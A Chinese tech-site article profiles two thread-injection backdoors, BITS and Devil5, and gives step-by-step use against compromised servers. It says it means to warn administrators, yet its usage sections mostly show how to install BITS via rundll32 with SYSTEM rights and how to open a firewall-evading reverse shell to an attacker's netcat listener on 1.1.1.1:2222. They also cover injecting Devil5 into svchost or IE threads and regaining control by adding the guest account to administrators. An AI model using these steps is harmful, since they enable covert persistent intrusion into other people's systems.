经典后门实例之线程插入后门

安全 黑客攻防
本文通过介绍BITS、魔鬼5号这两款线程插入后门,使得读者可以理解线程插入后门的隐蔽性和强大性,并通过运用举例,警醒管理员注意网络安全的防护。

线程插入后门其特点就在于插入二字,这种后门在运行的时候并没有自己的独立进程,而是插入到其他进程中,这样即便是安装了防火墙的企业和用户,也不能对这样的后门进行有效的防御,这种后门是现在非常主流的一种,很让防护的人头疼,因为对它的查杀比较困难,这种后门本身的功能比较强大。

这类的典范就是国内提倡网络共享的小榕的BITS了,从它的推出以来,各类安全工具下载园地里BITS就高居榜首,非常多的朋友使用它的过程中感到了方便。

BITS

类型:系统后门

使用范围:wind200/xp/2003

隐蔽程序:★★★★☆

使用难度:★★★☆☆

危害程序:★★★★☆

查杀难度:★★★★☆

BITS其实是Background Intelligent Transfer Servicer的缩写,可以在不知不觉中实现另一种意义的典型的线程插入后门,有以下特点:进程管理器中看不到;平时没有端口,只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows 200/xp/2003。

运用举例

首先我们用3389登录上肉鸡,确定你有SYSTEM的权限,将BITS.DLL拷贝到服务器上,执行CMD命令:

rundll32.exe bits.dll,install

这样就激活了BIST,程序用这个特征的字符来辨认使用者,也就相当于你的密码了,然后卸载:rundll32.exe BITS.dll,Uninstall

这是最简单的使用,这个后门除了隐蔽性好外,还有两大特点是非常 值得借鉴的:端口复用和正反向连接。虽然很多朋友经常听到这两个名词,但并不了解它们,端口复用就是利用系统正常的TCP端口通讯和控制,比如80、139等,这样的后门有个非常 大的好处就是非常 隐蔽,不用自己开端口也不会暴露自己的访问,因为通讯本身就是系统的正常访问!另一个是反向连接,这个很常 见,也是后门中一个经典思路,因为从服务器上主动方问外边是不被禁止的,很多很历害的防火墙就怕这点!

BITS的正向连接很简单,大家可以参考它的README,这种方式在服务器没有防火墙等措施的时候很管用,可以方便地连接,但是遇到有防火墙这样的方式就不灵了,得使用下面的反向连接方式:

在本地使用NC监听(如:nc -l -p 1234)

用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)

输入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email]

目标主机的CMD将会出现NC监听的端口2222,这样就实现了绕过防火墙的功能了。

devil5(魔鬼5号)

类型:系统后门

使用范围:win200/xp/2003

隐蔽程度:★★★★☆

使用难度:★★☆☆☆

危害程序:★★★★☆

查杀难度:★★★☆☆

同BITS一样,Devil5也是线程插入式的后门,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程,适合对系统有一定了解的使用都使用,由于是自定义插入线程,所以它更难被查杀,下面我们来看看它的使用。

运用举例:

道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制,一般设置成系统自带的SVCHOST,然后运行后门就可以控制了。

我们用TELNET连接上去,连接的格式是:TELNET *** 定制的端口,它和其他后门不同之处在于连接后没有提示的界面,每次执行程序也是分开的,必须要每次都有输入密码,比如我们丢掉了服务器和管账户,可以激活GUEST后再将GUEST加到管理员权限,记得每次执行命令后加上“>密码”就可以了:net localgroup administrators guest /add >hkfx,然后你又可以控制服务器了。

很明显示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通过系统自带端口通讯、执行命令比较麻烦,需要每次输入密码而且不回显示输入内容,很容易出错。但是,它有自己的优势:插入线程可以自已定制,比如设置IE的线程为插入的目标就比较难被查杀:自己提供了专门的查杀工具DELDEVIL5.exe,帮助防护者清理系统;而且它可以任意改名和绑定,使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。

另外,PortLess BackDoor等工具也是此类的后门,功能强大,隐蔽性稍差,大家有兴趣可以自己研究一下。
 

【编辑推荐】

  1. 如何封死黑客后门入侵
  2. 如何利用nc构建telnet后门控制
  3. telnet扩展后门方式的汇总及研究
  4. 开源软件为黑客们开好后门?
  5. 用Mysql语句来生成后门木马方案

 

责任编辑:张启峰 来源: 中国IT实验室
相关推荐

2010-09-13 15:06:36

2010-09-13 14:47:58

2010-09-13 15:14:03

2010-09-13 15:26:34

2011-03-31 08:56:32

2011-03-31 09:25:06

2011-03-31 09:25:13

2011-03-31 09:25:10

2010-08-31 10:00:55

LinuxICMP

2011-11-25 15:34:33

2023-01-06 08:42:02

2010-08-02 14:36:52

ICMPLinux

2020-11-06 00:00:00

PHP技巧后门

2013-08-09 09:50:34

2010-09-13 14:34:55

2018-01-11 09:51:34

2014-03-06 17:52:25

2010-08-26 11:15:47

LinuxICMP后门

2013-11-08 10:08:25

2009-07-07 17:10:04

创建UNIX后门
点赞
收藏

51CTO技术栈公众号